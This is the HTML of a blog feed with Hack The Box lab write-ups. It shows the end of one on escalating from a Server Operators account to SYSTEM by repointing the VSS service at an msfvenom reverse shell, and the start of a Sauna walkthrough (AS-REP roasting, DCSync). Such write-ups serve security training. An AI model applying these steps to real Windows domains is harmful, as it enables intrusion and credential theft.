srcset="/static/724dd625060b18d3d1d49e7c545bea02/dda05/evil-winrm-svc-printer.png 158w, /static/724dd625060b18d3d1d49e7c545bea02/679a3/evil-winrm-svc-printer.png 315w, /static/724dd625060b18d3d1d49e7c545bea02/50637/evil-winrm-svc-printer.png 630w, /static/724dd625060b18d3d1d49e7c545bea02/9f2f1/evil-winrm-svc-printer.png 731w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Checking group membership showed that <code class="language-text">svc-printer</code> was a member of the Server Operators group:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f7a3361e26e6fca2e0349c44297d023f/6f406/svc-printer-groups.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 24.68354430379747%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA3klEQVR42m2PS26DMBRF2QoBg4mh/oA/IVF+JilSM4s66P4XcvuAViJVB0dXtq+P3kuaKqAVPWwdYNQebRhh/B3a3aAplRug7IBanyFdpHNc0l6od4XqThDmBOkjhD4iUeYMTUh5hHg7wEwie6PiAEkUYj/DtjsUdb9iug+EB5uy6cFoqCQcPiBIVlIhLSzSvEXKLDaFm8lKv8A9Nty9UlKPd8i29Fa5meRyfyK+f2J8fMHuRjS0Gid5Rh8YSfI11UL2gpuFvyTaRuguwpFMttdZVtB6+V8Z/0/2w0r4DUjenQzCWvG5AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="svc-printer groups" title="" src="/static/f7a3361e26e6fca2e0349c44297d023f/50637/svc-printer-groups.png" srcset="/static/f7a3361e26e6fca2e0349c44297d023f/dda05/svc-printer-groups.png 158w, /static/f7a3361e26e6fca2e0349c44297d023f/679a3/svc-printer-groups.png 315w, /static/f7a3361e26e6fca2e0349c44297d023f/50637/svc-printer-groups.png 630w, /static/f7a3361e26e6fca2e0349c44297d023f/6f406/svc-printer-groups.png 710w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Members of the Server Operators group can perform some privileged actions on domain controllers. As stated on the <a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups#server-operators" target="_blank">Microsoft Docs</a>:</p> <blockquote> <p>Members of the Server Operators group can administer domain controllers. This group exists only on domain controllers. By default, the group has no members. Members of the Server Operators group can take the following actions: sign in to a server interactively, create and delete network shared resources, start and stop services, back up and restore files, format the hard disk drive of the computer, and shut down the computer. This group can't be renamed, deleted, or removed.</p> </blockquote> <p>Based on the permissions granted to members of the Server Operators group, service configurations could potentially be modified, thus creating opportunities for privilege escalation. One method involves altering the binary path of a service running with elevated privileges, such as <code class="language-text">LocalSystem</code>, to run an executable or command that sends a reverse shell.</p> <p>First, I used <code class="language-text">msfvenom</code> to create a reverse TCP payload (<code class="language-text">rev-shell.exe</code>):</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/80285f102e43d21c8c651ba933c782ff/e8a52/msfvenom-payload.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 34.177215189873415%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABWUlEQVR42nWR2XKDMAxF+ZQmQFhCIJjFSwibCaGQzmT5/2+5VZx2Mn3og+Z6bOnoSrbcfIFb3LDen7HnGv14R6OvpA/o6YFMjthECv5OIUwqeJGAF5bYhBzBrkKQHOGECm50gB0IWEV7Be9uyA4LWDlAHhfwwydyMaJUZ5TVhJTu06JHRg33pGl5Ih3A5ARGebusR1JqBNTM4moEKzoKbYDRvqFkjSTvqFC/zllHDU4EHQzoqVHaGlBI+Vs6b2OJICZg3V9xaBaIakY33KHqCwS5lMeZnE4o1GTe0pyK4yNi1tHoDVZeibX/GwIfToKVn8NS9YJSns2Ir3FnKmrBOLkhZy7tZRMKOB6H/YRsnsrNvt4h6Z5h7aWwXDbDSS9wkhERa8jtFyqKurui1TcavTcgx+c/IUzYvvgLpbeVE8Py89nsKMleuwpj+smtJFeSVBl9w95Q+x/oNwDG4kVZRMqiAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="msfvenom payload" title="" src="/static/80285f102e43d21c8c651ba933c782ff/50637/msfvenom-payload.png" srcset="/static/80285f102e43d21c8c651ba933c782ff/dda05/msfvenom-payload.png 158w, /static/80285f102e43d21c8c651ba933c782ff/679a3/msfvenom-payload.png 315w, /static/80285f102e43d21c8c651ba933c782ff/50637/msfvenom-payload.png 630w, /static/80285f102e43d21c8c651ba933c782ff/e8a52/msfvenom-payload.png 666w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I uploaded <code class="language-text">rev-shell.exe</code> onto the target machine:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/162d2f97fa306c012c6bf466f9ea469b/9f2f1/upload-rev-shell.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 17.72151898734177%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAwElEQVR42o2Q2W7CQAxF8ykwQxCzZJkGspAmJDSUFqn//zkHZ1AfK/Xh6NqWda/spDANwbYcqw7/diHUH+THmdB9UXZ3qv4RtWhuMruT1wtl+yn9wqG8oFyHdme0F/VnEhW+UdUPKjxQfmJje7ZuYOtHYUJl1zhX0isvBtlqMgjv6HxmF5leFDOJcSNWlo0fOLgeY1qMLK+1y0Z2tkHb+m/ML6dIkkrCvljY51fRG2kmifKGVE5J11PkHTqa/oeaJ7epfNk57IFhAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="upload reverse shell payload" title="" src="/static/162d2f97fa306c012c6bf466f9ea469b/50637/upload-rev-shell.png" srcset="/static/162d2f97fa306c012c6bf466f9ea469b/dda05/upload-rev-shell.png 158w, /static/162d2f97fa306c012c6bf466f9ea469b/679a3/upload-rev-shell.png 315w, /static/162d2f97fa306c012c6bf466f9ea469b/50637/upload-rev-shell.png 630w, /static/162d2f97fa306c012c6bf466f9ea469b/9f2f1/upload-rev-shell.png 731w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Started a local Netcat listener:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 325px; " > <a class="gatsby-resp-image-link" href="/static/8260a28eeeeaaf10850a1df55bdda05d/59727/netcat-443.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 25.316455696202528%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABBklEQVR42m3O206DQBAGYB7FdjmzEjkVyrGkrEZDS6utaIwHTGwab7z26X8HiFETL77Mzu7M7EjKWQrNI2kLOe1GGUk6KLMr6H4GUbdon45objts21dsyN3LO/aPB9w8vGG9f0bV3IPxCJLqppDjHVi4BnMqKMESel7DiC6Qi2vwoIRmJ+BuAcvNYQcL2H4J08nAfbrzF+BeAZMMA51IIDvfIas2pEG2XCEsLuHFAjnlhdgODUm5oiE5FD7H1JjhRPNH+miiB2BWCOn48Ym4rMGoqN/Eok200xgqNfa5QZuolPdn2YoGfSMzf7F+SO5cQKXi/ocpPQ6Rhn+b6H0MB3+G/McK8QVOZ6R4euYngQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netcat port 443" title="" src="/static/8260a28eeeeaaf10850a1df55bdda05d/59727/netcat-443.png" srcset="/static/8260a28eeeeaaf10850a1df55bdda05d/dda05/netcat-443.png 158w, /static/8260a28eeeeaaf10850a1df55bdda05d/679a3/netcat-443.png 315w, /static/8260a28eeeeaaf10850a1df55bdda05d/59727/netcat-443.png 325w" sizes="(max-width: 325px) 100vw, 325px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The Volume Shadow Copy service (VSS) typically runs as <code class="language-text">LocalSystem</code> by default, and in this case, the service was writable. So using <code class="language-text">sc.exe</code>, I configured the binary path of VSS to point to the location of the payload (<code class="language-text">"C\Users\svc-printer\Desktop\rev-shell.exe"</code>). Then, I ran <code class="language-text">sc.exe start VSS</code> to start it:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/fe77f4c6623621188d80c5f17b4e97de/9f2f1/service-config-start.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 12.658227848101264%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAnElEQVR42jWMWQ6CMBRFWYpTASlTEQqlMoOakJC4/8Vc+4p8nNyb8wZnqt8YuwXNuKFdvtD9ikJ/IKoZiRxtRnmP8LEjysl6IlMvxGaWygkp+WKAM5jjrplRdyv0sEG1e4pytg9oiWctArFDnfzlLnHycpz94k9ucVwjmSksKOFyBcYrsFDBi2r4iTY84Zp+QN6LNa5m/+DGKaXlB+npYM1kwuDdAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="config service path with msfvenom payload and start" title="" src="/static/fe77f4c6623621188d80c5f17b4e97de/50637/service-config-start.png" srcset="/static/fe77f4c6623621188d80c5f17b4e97de/dda05/service-config-start.png 158w, /static/fe77f4c6623621188d80c5f17b4e97de/679a3/service-config-start.png 315w, /static/fe77f4c6623621188d80c5f17b4e97de/50637/service-config-start.png 630w, /static/fe77f4c6623621188d80c5f17b4e97de/9f2f1/service-config-start.png 731w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Once the service started, <code class="language-text">rev-shell.exe</code> was executed, and a connection was established as <code class="language-text">nt authority\system</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 522px; " > <a class="gatsby-resp-image-link" href="/static/fd9764b0a9a9edc695a74c219df43153/03dc1/system-shell.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 82.27848101265823%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACnklEQVR42n1U2XKbQBDkU4IAIZC4T3FflixbPlPJ//9Jp2eRXS6nkoeuWdBuT3fPIm2b9LCyZ5jFG7bVT7jFBWExoZ1f0BDt/Iru7g31eEVYztCdDJsd4eQKOtf67dlwC2hp+4j29Av1dEXeP6Dn4SNrUp2xj3u4UQs7qBHkM/x0VOt93GEXNPytU2upTtishPVwRb+8UMET8UzCV1R8dxyeUHQPKPtHrq9YHn9jOL+j4r64XHAgUZBNxMhmE597pVLzkxFZfY+yvaAkgTRIjifkzb0ilhoWszos74/c4yUDEpJG2YCNnUC3IujbCIYdQ0uKOzSihqQRbaXcmFUkpOWiucDxaxi7HCbtmA7hlrD2RwVZG3y3ghnuUmg5iVraCKnAZ+cVIyzZvMtvYOi2IFdV3yb4YcVK2WYbY6PqCs2Lh5vlB6RitT4r+0Lshu1nA2l4YPgeITXg7ThwYKrhF5VaXCyo+quyLbWW2nEQAjbppheUtB6Q2GPwXxt4rKZT8hqln0q1fUAVVOlzs5CrA7fnMOUUeShIJpWlbn9YF9spLccrESMwthnVyrWhKlEUc5IyiKw8cXozsuMZMrCCU5ZIXN47yVVgygDslFhJjF25gmo1UdPSZib5kaSomGd9Ifm9UifXSKZ9iHoqEmtUSHUmiUySmB9kH4Su31DJ8mnPC3vesRNiqhSFcS5YFOT3KJ25p7sRFn8Tyqa0WA95VOHHPMS1HIyyRUUg7w8kCfhbyDwP/yOUDGWaPf8EQqpSE+b37cv36TUYlzdYvBJi1bBzBbH+T8KUCoRELrcMo+mfMN29o+6ukDgEllOq8MVFN/JfaHhWqk35gr7lqKlJ2WvQUk27UIMR5XLIiwbmuagYhFAaVd3aXAYqir8S/gFpQAZk8o3JaAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="system shell from msfvenom payload" title="" src="/static/fd9764b0a9a9edc695a74c219df43153/03dc1/system-shell.png" srcset="/static/fd9764b0a9a9edc695a74c219df43153/dda05/system-shell.png 158w, /static/fd9764b0a9a9edc695a74c219df43153/679a3/system-shell.png 315w, /static/fd9764b0a9a9edc695a74c219df43153/03dc1/system-shell.png 522w" sizes="(max-width: 522px) 100vw, 522px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-sauna/https://mgarrity.com/hack-the-box-sauna/Thu, 02 Nov 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/611a73ff73cfca7f548a1bea62915332/3b67f/sauna.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/UlEQVR42mMQkdX+jxPLAbGM9n8hSS0wDebL4scMuCREgZoFJbT+88vo/JfS0fkvIKcD5BM2lAGnYUBXKRrr/y9vtfg/dar9/+Ia0/9KQD5IXFSOVANltP7zKev9r0vS/f+pQPl/e0bw/8cRkv9rUg3+8yrqguWJNxBou5C41n8ZE6DrYvX/b7DS+J/kYve/W0Pqf0GcwX8ZA31wmOJyJVYXCgMjQFxR+79fhuX/8ADX/wlqav9tzbT/B2Sa/xdTgEQUyWEoAIwQZaArY/Os/yclm/6PyjL5r2aqDxYnOQyRY1kYSMsDvSkir0PQMLwGwgwF0UJSQIOQ+PgMBAA4awMjmNn55gAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Sauna" title="" src="/static/611a73ff73cfca7f548a1bea62915332/50637/sauna.png" srcset="/static/611a73ff73cfca7f548a1bea62915332/dda05/sauna.png 158w, /static/611a73ff73cfca7f548a1bea62915332/679a3/sauna.png 315w, /static/611a73ff73cfca7f548a1bea62915332/50637/sauna.png 630w, /static/611a73ff73cfca7f548a1bea62915332/fddb0/sauna.png 945w, /static/611a73ff73cfca7f548a1bea62915332/3b67f/sauna.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Sauna is a Windows machine featuring an Active Directory environment. A list of potential usernames can be generated based on a webpage that contains employee names. The username list can then be used to run an AS-REP roasting attack, resulting in a hash for one of the users which can be cracked offline. After making a WinRM connection to the box, system enumeration can be performed with WinPEAS, leading to the discovery of credentials for another user with an auto logon configuration. Further enumeration with BloodHound shows that this user has privileges that grant the ability to perform a DCSync attack, allowing for the retrieval of the <code class="language-text">Administrator</code> user's password hash which can be used to obtain a shell as <code class="language-text">nt authority\system</code>.</p> <p><code class="language-text">nmap</code> scan:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e87dfdbece8e55a7d74a074e51b302e0/5a032/nmap-scan.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 111.39240506329114%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAYAAADAQbwGAAAACXBIWXMAAAsTAAALEwEAmpwYAAADlUlEQVR42m1V6XriSBDzm+wAwRgf+L5vbK5wJZnM7Ps/iVbVQCaT7A993ca2rFKpGm0RDTDyVyzSC4xojbw/odm+YXP8F+32Fat4DTvs4EQd5lYGfVUozKwUTwrJX9Cq8RXl+KZIsvZIwjOG42+SvaEjYbE+8/cTqvUFSX1AmG9g+g1mZqpIZ19Itbw7IcpH5CQruK+GF8TVHl4yICp3St0q6rH0KkyXyQc+E35Wq9X8shPUiLIBRfuMtN7jn3nAUnv0+3eqe6aqLYlbktbqRUX2wIPQztQ9Lcx3aIcrepaXlFv4UasQxC1iXptBg7mdw3Ar6FxF3cSIMZH1vp8uY/wgJiYVpiwrZ4l5c0RN/7rxBS19K+otymanfDP9WhFaJBf/rKD9WEW57KUikxVoYbbFkg+bbgGbLzrEE7+6XJXw2FmXasNigyAbYZNg4ZZY8J7uFFwLtZdV7JBVq6hKFCYFVdYn+njmix0bc0RDpU13oOoL0nJEnK0RJP0ndR0s2VOlKBRyrWNkyu7CkgUnRuWdpBd4fMDxSwSMiZusb4qcHAsrgmEnzOJN5Q25WsVrrSJZUhzYEOnwEf3uF1Kq02mwlOww2F46wmfJK0ZJ4mT7FQwnUwSCB+ETg6/V/RVVe0VM0jDbIaNKL6EqkgVJh5TNSqoDlvRWSpUmSHPET5kih9cyRV46qF4owoYQ//LmzIlgsMs9CRlsPhSmbEzcsYMlLIZbOulSpZBMVWTuMbrv2ZQruuGVkXlhE7iS0PQakgycHsanYbDTHj5J58sIU91jCgLMacnsa8gJraaHlcKVnXwmwZmRqRVhwzlv2DTxtd38VP45YQ+L0RHymRF+J5SYlAonZGyGePljHrPLo/pIwY8JaclKDHZ2YtzmeKIHJCTpY64fhEqdEFJZVj3TyyNsj2OX79Ft3lHRinb8SW+vWFGd6dbMXquGYEbfvimUFyXUMZGVB7h8aWExWybn1+b8moXCwikZFWJVKUhzvqpThDYbIMoy+hdzDAN6Z9LDB0StbmZUkyhMP/BdnSL0GI+C2RMfk3yvSl75HClFyAPBbZTap2X6Df9LKAqFRBDzKJMPPMqe6lShi7K/ieamgOffA9YfaD5L9EgQcLwCxkJd87/FJbyQhwG7Lc2QU1t+V/ckOhTi3E9zORhkUmSCNF8e4OliuXJ0tYrckYe5l1VednjfoQ3ipxBKc8TPm8L0ru72N/AfiM7L+wCR/6kAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap scan" title="" src="/static/e87dfdbece8e55a7d74a074e51b302e0/50637/nmap-scan.png" srcset="/static/e87dfdbece8e55a7d74a074e51b302e0/dda05/nmap-scan.png 158w, /static/e87dfdbece8e55a7d74a074e51b302e0/679a3/nmap-scan.png 315w, /static/e87dfdbece8e55a7d74a074e51b302e0/50637/nmap-scan.png 630w, /static/e87dfdbece8e55a7d74a074e51b302e0/5a032/nmap-scan.png 748w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Notable open ports:</p> <ul> <li>53 (DNS)</li> <li>80 (HTTP)</li> <li>88 (Kerberos)</li> <li>135 (MSRPC)</li> <li>139, 445 (SMB)</li> <li>464 (kpasswd)</li> <li>389, 3268 (LDAP)</li> <li>636, 3269 (LDAPS)</li> <li>5985 (WinRM)</li> </ul> <p>Active Directory:</p> <ul> <li>domain name: EGOTISTICAL-BANK.LOCAL</li> <li>hostname: SAUNA</li> </ul> <p>Webpage on port 80:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/15f630db6d8db0a34a0ec1c026b4e649/bb71a/visit-webpage.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 54.43037974683544%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC/klEQVR42iWT3U+TZxjGu02qlO+WFko/39IPhZZSIZav2haobaXQT94X2tLvUrSyxS0u2WaGyVzmDpwHblkWE01M5GCni8n+lMU/wKMtMUaB7OS3J+7gzp08B79c93Vdj0q/lcNZkrnU2sfd6SI1O7jaB9jFDt3+nMd/vOSXl3/y8/ExT359xPMnD3n24umH95+Of+eHo+95dP9HSve+46ONDCpdepu5ZoHVL79g+c7XTAqQ8+CQ6UKGQi7Om7//4eTt2w9zenLK+/cnnL57x9nZCf+++ovXDx5y9vg3nj1/gWoji8qQlxnbqTJWqmGqNJFaN/HXq0Sv2LAM9tDfp2FiTIt1XI/HrMVv68dnG8RrHWB2aoxpOYP5xqfoynUuZBUBzCmYihUstRZSo4Ojc0gkHyPhHSEgjeOZ0JEO+Qm6JghNSwSdOpx6FZaRT7Ab1DiCs4wqewzJZXrzu6hG8wpGpcy4GEupir3SIpYIEvdZcWj7WbxopBCeJRf2EZ/3cG3uInZ9L8ahHqwGDZORZQzlJsMCqs4J4EhOxtu+wdY335ISkzu6z/5nB+RXl7kWDnGzukF6ZYpbe6ukxI7OSARcZvrUH2PVqZEiIUZLDYZ2Kpz/X6GMWwQRv3vE1TtfEb17j1q7SsTnIhVeoLC2RHbFz5LHROrKFPvpVWILXjTqc4wbBrEnEmiLDXTFOn3bJeFhYQfbXh1Ho429fYtkt0M+NIvXbcNqGsFl0pJZuIxXeHnZYWB9/hLleBBJwAyeSYyVtgDWGFQqqLNCoSG7LXxr4O3eJtttUUkGWYqv4RPVcQpPzS6J9YBbeGlixjyM1mIkGr9KcT2AKRpFL4DDShXNdhl1WqQ8milg2S2RlK+TnJeYjIaxtg9xt7t4RIUccpFQPELMbxEq+3DPeLCKq+pKjJXrUQaKTQaEut58iZ4tGZVrc5NMapnwtBG7gHlFpzbET8nvVUlk0uSKu+TXAmwGJeYcWqFygMXFIIqcpZYUViRi4twaGpHwuVSB/wCUR5lv+tHtngAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="visit webpage" title="" src="/static/15f630db6d8db0a34a0ec1c026b4e649/50637/visit-webpage.png" srcset="/static/15f630db6d8db0a34a0ec1c026b4e649/dda05/visit-webpage.png 158w, /static/15f630db6d8db0a34a0ec1c026b4e649/679a3/visit-webpage.png 315w, /static/15f630db6d8db0a34a0ec1c026b4e649/50637/visit-webpage.png 630w, /static/15f630db6d8db0a34a0ec1c026b4e649/fddb0/visit-webpage.png 945w, /static/15f630db6d8db0a34a0ec1c026b4e649/f46b1/visit-webpage.png 1260w, /static/15f630db6d8db0a34a0ec1c026b4e649/bb71a/visit-webpage.png 1271w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The most interesting part of the website was the about page which contained a section that mentioned employee names:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/8869173105007bbbec5e86f203ca5838/6d283/about-page.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 74.0506329113924%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAABwElEQVR42q2TP0sjQRjGt/LTnJW1h1YWNn4Bba4QwcZCPM8rrG7xQLQRRMTYqDk1d1yjR4pIVDAYjeJfBCExzcpuTr012d2ZnZ3n3kw2q4WCxAzMDry783uf59kZDeGQaM7Qqo+f8WWMDw3i9PREFYMggJSyoSba/d0d2lo/oEXT8OXziCr6QkBI2bjCiW86Ots/Yj+TUcXt5AYWpnQ4jNfiqMJVg7CJCGiK14HC91GpVNSqgIklfB34hH+OGwFlqDggkG3comxaKJfL0RRhAwXkBPIYi7p4nodH+kjZpzzPMmkcp/+AcR+SNhYLBZilEkzTRInWYvEGrus+AbO7O9BHh2FapWeKavBHhyG1EsOP72MwrL/UgUMYBjiBfRLCOY/W6j6NUx7p32vo7erASnxdQQ62U4jPTtfiovf56zyuzy/IBVdZ2g8PsG1bWa26cR0HLHSoFF4e7iE2v4B8/kYVj7Y2kZjRKfuaTIfsuLShnmNdvXzhJChgQC8EZVU/4p7HKBOGRk5O+Jc5KvY9pGzSTckmf2GyvwfGVe5VK28GCp9hTh9FX3c7thKL0dV7l8KTXBardJ8ty3q/QjR5/AdJcHhoK5iZRwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="about page" title="" src="/static/8869173105007bbbec5e86f203ca5838/50637/about-page.png" srcset="/static/8869173105007bbbec5e86f203ca5838/dda05/about-page.png 158w, /static/8869173105007bbbec5e86f203ca5838/679a3/about-page.png 315w, /static/8869173105007bbbec5e86f203ca5838/50637/about-page.png 630w, /static/8869173105007bbbec5e86f203ca5838/fddb0/about-page.png 945w, /static/8869173105007bbbec5e86f203ca5838/6d283/about-page.png 976w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Since the machine was running Active Directory, I used the employee names to make a wordlist consisting of various usernames based on the common AD naming conventions so that I could use it to try and discover any AS-REP-Roastable accounts:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 370px; " > <a class="gatsby-resp-image-link" href="/static/067f0c33f1a3e753b81c906aec81528a/c9d3d/users-list.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 170.88607594936713%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAiCAYAAABfqvm9AAAACXBIWXMAAAsTAAALEwEAmpwYAAADoklEQVR42qWW63aiWBCFeZFe3SLgJaKCXLyCiAh4N5qY7s7/WfP+D7Bnn4MxdlYm2smPWkaN39lVtasOit7so+pG0LwHGSXvifETZSuG3uwizg5Ybp6Q5veYJGusd7+wWB+RrY5IFg+o2gHUmody3ZehiA80fwOtd0DNX2P+8C/S/T+Il8+Isj3u7BC2P4XlxbD8CdpOyAjQsodoWX1odedPYMtLkMyPGEVLuL0JZvkOXneMst6CXrHxQzXxXW1chHkRDZTKDajVDmHdAihOn2Vb9IMMo/Ec/iBF5c5HSbehGg7KVRcaFcioevJ9uUKAYUHV21C1FlQefAa6gxz5+hcG4yXCZMe0EhiNPtPwi38Sr4SohKgGAVQuQyuiJF4JPqfs9jMsts8YjlfohwuM0wcMoxXVsDZSxenHOv82qESorgil/im6xXcnlUqnN0O6fCJkg4EAUqXjhUU6AlBxzz8s196LHmEua3lHtU0oTSfCKN4hnu1gs4M1swetIlI8Qf4XVMDEgSXNlCFKophWKOsXTbcwrQA/dIcN6L3CPgKySbLLxksNRcpsQjQ70LT3qJr0FQH6JeyjVFmWkt48d7jwYSdGMNky5T29uJEw7SYgmyHSvLDMCRhhPL2XYbkxTxQ+u6V+9GrZlHYqgC/G5qRMaZWQKlv2GN5gjjZVX2/KCWjYF0DW0O6myJc/ETDd4XiNJDvCcqjU8K6nLGrItKX5X42dI+MsBxHryMa07MnNNZSW4Ty/TgoVegTOV78xCBac5TUNvoXXS29vjNGR1hGmFktC6TDl+fq37PAoXHL/HTEMV9BrN6p8USrmmmDFcqfShxG73Bvm3DZz1M2hbMrNqcvDiyWiNNqhnOMke5Bd/qZaHL0Cpv2FJ1+gclKEB0VTanJSfKb7AfAKVPowmOzkpDiEC+BrdP8arLSdCaJkjwmB/dGcXSvW1c3QNwfwCkgQi0nhCjPbAdMeoVLvvYHeDlYsppzmj1Kh6HQY37PLA7mVtSvQ9+CKQ2On80ck+VGOX6PFe9Z4D3YdLEKOnpiUaXqQ94rYOFVeUu8rvA5X3B4vqc0z61gsWWFyr5vI5twG/DNkU6bZo+x0NN3xfl6hetf/FEwCxehNOb9hTGM3BrxPunLBfhrocDmIBSsXQvXzoDNQrK+c97LPJwjhvy8DO90ZPXigyj1sdyLvlK8olbZZ8NlmyKcGo96VD0RfUmgwzXpzIGFiURbAt3EjsObjP/mgLJ+4pW62AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img 